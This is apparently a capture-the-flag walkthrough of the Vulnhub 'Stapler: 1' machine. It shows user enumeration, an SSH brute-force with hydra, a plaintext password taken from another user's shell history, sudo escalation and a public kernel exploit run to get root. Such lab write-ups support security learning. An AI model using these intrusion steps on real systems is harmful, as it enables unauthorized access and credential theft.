Stapler: 1

Stapler: 1 from Vulnhub

Nmap scan result

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-06-17 12:29 CST
Warning: giving up on port because retransmission cap hit (2).
Nmap scan report for
Host is up (0.00035s latency).
Not shown: 992 filtered ports
20/tcp   closed ftp-data
21/tcp   open   ftp
22/tcp   open   ssh
53/tcp   open   domain
80/tcp   open   http
139/tcp  open   netbios-ssn
666/tcp  open   doom
3306/tcp open   mysql
MAC Address: 08:00:27:F5:FB:B3 (Cadmus Computer Systems)

Nmap done: 1 IP address (1 host up) scanned in 8.43 seconds

The description says that:

There are multiple methods to-do this machine
At least two (2) paths to get a limited shell
At least three (3) ways to get a root access

Limited shell 1

I used enum4linux to test the 139 port, which gave me the users on this machine.

[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\peter (Local User)
S-1-22-1-1001 Unix User\RNunemaker (Local User)
S-1-22-1-1002 Unix User\ETollefson (Local User)
S-1-22-1-1003 Unix User\DSwanger (Local User)
S-1-22-1-1004 Unix User\AParnell (Local User)
S-1-22-1-1005 Unix User\SHayslett (Local User)
S-1-22-1-1006 Unix User\MBassin (Local User)
S-1-22-1-1007 Unix User\JBare (Local User)
S-1-22-1-1008 Unix User\LSolum (Local User)
S-1-22-1-1009 Unix User\IChadwick (Local User)
S-1-22-1-1010 Unix User\MFrei (Local User)
S-1-22-1-1011 Unix User\SStroud (Local User)
S-1-22-1-1012 Unix User\CCeaser (Local User)
S-1-22-1-1013 Unix User\JKanode (Local User)
S-1-22-1-1014 Unix User\CJoo (Local User)
S-1-22-1-1015 Unix User\Eeth (Local User)
S-1-22-1-1016 Unix User\LSolum2 (Local User)
S-1-22-1-1017 Unix User\JLipps (Local User)
S-1-22-1-1018 Unix User\jamie (Local User)
S-1-22-1-1019 Unix User\Sam (Local User)
S-1-22-1-1020 Unix User\Drew (Local User)
S-1-22-1-1021 Unix User\jess (Local User)
S-1-22-1-1022 Unix User\SHAY (Local User)
S-1-22-1-1023 Unix User\Taylor (Local User)
S-1-22-1-1024 Unix User\mel (Local User)
S-1-22-1-1025 Unix User\kai (Local User)
S-1-22-1-1026 Unix User\zoe (Local User)
S-1-22-1-1027 Unix User\NATHAN (Local User)
S-1-22-1-1028 Unix User\www (Local User)
S-1-22-1-1029 Unix User\elly (Local User)

Then I compsed these names into a file, then tried to brute force with it for both user name and password on the ssh service.

# grep 'Unix User' e4l_result | cut -d'\' -f2 | cut -d' ' -f1 > user_list
# hydra -L user_list -P user_list ssh

Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2016-06-17 13:42:48
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
[DATA] max 16 tasks per 1 server, overall 64 tasks, 900 login tries (l:30/p:30), ~0 tries per task
[DATA] attacking service ssh on port 22
[22][ssh] host:   login: SHayslett   password: SHayslett

Here we got SHayslett who set the password the same as the username. Now we can login the ssh with this credential.

ssh SHayslett@
~          Barry, don't forget to put a message here           ~
SHayslett@'s password:
Welcome back!

SHayslett@red:~$ id
uid=1005(SHayslett) gid=1005(SHayslett) groups=1005(SHayslett)

Privilege Escalation 1

After logged in as SHayslett, I found it is available to browse every users’ home directory.

SHayslett@red:/home$ ls -al
total 128
drwxr-xr-x 32 root       root       4096 Jun  4 20:13 .
drwxr-xr-x 22 root       root       4096 Jun  7 09:08 ..
drwxr-xr-x  2 AParnell   AParnell   4096 Jun  5 18:21 AParnell
drwxr-xr-x  2 CCeaser    CCeaser    4096 Jun  5 18:26 CCeaser
drwxr-xr-x  2 CJoo       CJoo       4096 Jun  5 18:24 CJoo
drwxr-xr-x  2 Drew       Drew       4096 Jun  5 18:24 Drew
drwxr-xr-x  2 DSwanger   DSwanger   4096 Jun  5 18:24 DSwanger
drwxr-xr-x  2 Eeth       Eeth       4096 Jun  5 18:24 Eeth
drwxr-xr-x  2 elly       elly       4096 Jun  5 18:24 elly
drwxr-xr-x  2 ETollefson ETollefson 4096 Jun  5 18:24 ETollefson
drwxr-xr-x  2 IChadwick  IChadwick  4096 Jun  5 18:24 IChadwick
drwxr-xr-x  2 jamie      jamie      4096 Jun  5 18:26 jamie
drwxr-xr-x  2 JBare      JBare      4096 Jun  5 18:24 JBare
drwxr-xr-x  2 jess       jess       4096 Jun  5 18:24 jess
drwxr-xr-x  2 JKanode    JKanode    4096 Jun  5 18:25 JKanode
drwxr-xr-x  2 JLipps     JLipps     4096 Jun  5 18:26 JLipps
drwxr-xr-x  2 kai        kai        4096 Jun  5 18:24 kai
drwxr-xr-x  2 LSolum     LSolum     4096 Jun  5 18:24 LSolum
drwxr-xr-x  2 LSolum2    LSolum2    4096 Jun  5 18:26 LSolum2
drwxr-xr-x  2 MBassin    MBassin    4096 Jun  5 18:24 MBassin
drwxr-xr-x  2 mel        mel        4096 Jun  5 18:24 mel
drwxr-xr-x  2 MFrei      MFrei      4096 Jun  5 18:24 MFrei
drwxr-xr-x  2 NATHAN     NATHAN     4096 Jun  5 18:24 NATHAN
drwxr-xr-x  3 peter      peter      4096 Jun  3 16:11 peter
drwxr-xr-x  2 RNunemaker RNunemaker 4096 Jun  5 18:24 RNunemaker
drwxr-xr-x  2 Sam        Sam        4096 Jun  5 18:24 Sam
drwxr-xr-x  2 SHAY       SHAY       4096 Jun  5 18:24 SHAY
drwxr-xr-x  3 SHayslett  SHayslett  4096 Jun 17 13:04 SHayslett
drwxr-xr-x  2 SStroud    SStroud    4096 Jun  5 18:24 SStroud
drwxr-xr-x  2 Taylor     Taylor     4096 Jun  5 18:26 Taylor
drwxrwxrwx  2 www        www        4096 Jun  5 18:25 www
drwxr-xr-x  2 zoe        zoe        4096 Jun  5 18:26 zoe

Let’s check if there’s any interesting stuff in them.

SHayslett@red:/home$ ls -alR | grep -v .bash_logout | grep -v .bashrc |grep -v .profile
total 24
drwxr-xr-x  2 JKanode JKanode 4096 Jun  5 18:25 .
drwxr-xr-x 32 root    root    4096 Jun  4 20:13 ..
-rw-r--r--  1 JKanode JKanode  167 Jun  5 18:25 .bash_history

We found something different in JKanode’s and peter’s home directory.

Now take a look at the .bash_history in JKanode

SHayslett@red:/home/JKanode$ cat .bash_history
ls -lah
ps aux
sshpass -p thisimypassword ssh JKanode@localhost
apt-get install sshpass
sshpass -p JZQuyIN5 peter@localhost
ps -ef
kill -9 3747

Looks like we have peter’s password here. Now it’s time to switch to peter’s account.

(Not sure if this is the second way to get the limited shell)

SHayslett@red:/home/JKanode$ ssh peter@localhost
The authenticity of host 'localhost (' can't be established.
ECDSA key fingerprint is SHA256:WuY26BwbaoIOawwEIZRaZGve4JZFaRo7iSvLNoCwyfA.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'localhost' (ECDSA) to the list of known hosts.
~          Barry, don't forget to put a message here           ~
peter@localhost's password:
Welcome back!
This is the Z Shell configuration function for new users,
You are seeing this message because you have no zsh startup files
(the files .zshenv, .zprofile, .zshrc, .zlogin in the directory
~).  This function can help you with a few settings that should
make your use of the shell easier.

You can:

(q)  Quit and do nothing.  The function will be run again next time.

(0)  Exit, creating the file ~/.zshrc containing just a comment.
     That will prevent this function being run again.

(1)  Continue to the main menu.

(2)  Populate your ~/.zshrc with the configuration recommended
     by the system administrator and exit (you will need to edit
     the file by hand, if so desired).

--- Type one of the keys in parentheses ---q
%red id
uid=1000(peter) gid=1000(peter) groups=1000(peter),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)

Now we are logged in as peter. And let’s check the home directory first.

red% ls -al
total 72
drwxr-xr-x  3 peter peter  4096 Jun  3 16:11 .
drwxr-xr-x 32 root  root   4096 Jun  4 20:13 ..
-rw-------  1 peter peter     1 Jun  5 18:00 .bash_history
-rw-r--r--  1 peter peter   220 Jun  3 13:53 .bash_logout
-rw-r--r--  1 peter peter  3771 Jun  3 13:53 .bashrc
drwx------  2 peter peter  4096 Jun  6 23:17 .cache
-rw-r--r--  1 peter peter   675 Jun  3 13:53 .profile
-rw-r--r--  1 peter peter     0 Jun  3 13:55 .sudo_as_admin_successful
-rw-------  1 peter peter   577 Jun  3 14:11 .viminfo
-rw-rw-r--  1 peter peter 39206 Jun  3 16:11 .zcompdump


Looks like peter had sudo access before. Let’s give it a try.

red% sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for peter:
Matching Defaults entries for peter on red:
    lecture=always, env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User peter may run the following commands on red:
    (ALL : ALL) ALL

It seems that peter is granted access to all commands. Now we can logged in as root simply and get the flag!

red% sudo su
➜  peter id
uid=0(root) gid=0(root) groups=0(root)
➜  peter cat /root/flag.txt
                          |       |
                          |       |
         _,._             |       |
    __.o`   o`"-.         |       |
 .-O o `"-.o   O )_,._    |       |
( o   O  o )--.-"`O   o"-.`'-----'`
 '--------'  (   o  O    o)

Privilege Escalation 2

Here’s the system information.

red% uname -a
Linux red.initech 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux
red% cat /etc/os-release
VERSION="16.04 LTS (Xenial Xerus)"
PRETTY_NAME="Ubuntu 16.04 LTS"

It can be easily pwnd with the exploit found on exploit-db.

red% ./compile.sh
doubleput.c: In function ‘make_setuid’:
doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
    .insns = (__aligned_u64) insns,
doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
    .license = (__aligned_u64)""
red% ./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
root@red:~/ebpf_mapfd_doubleput_exploit# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare),1000(peter)
root@red:~/ebpf_mapfd_doubleput_exploit# cat /root/flag.txt
                          |       |
                          |       |
         _,._             |       |
    __.o`   o`"-.         |       |
 .-O o `"-.o   O )_,._    |       |
( o   O  o )--.-"`O   o"-.`'-----'`
 '--------'  (   o  O    o)

Ongoing Attempts

Port 666

After connecting to port 666 with nc, it response with a stream of data then closed the connection.

I tried to direct the stream to a output file. It turns out that it is a zip file, which contains a image call message2.jpg.

# nc 666 > output
# file output
output: Zip archive data, at least v2.0 to extract
# unzip output
Archive:  output
  inflating: message2.jpg

Then I got a cookie by searching strings in it….

# strings message2.jpg
vPhotoshop 3.0
1If you are reading this, you should get a cookie!

Port 80

The web sever is setup by using the php command directly.

red% ps aux
root      1409  0.0  0.2   6472  3060 ?        S    11:07   0:00 su -c authbind php -S -t /home/www/ &>/dev/null www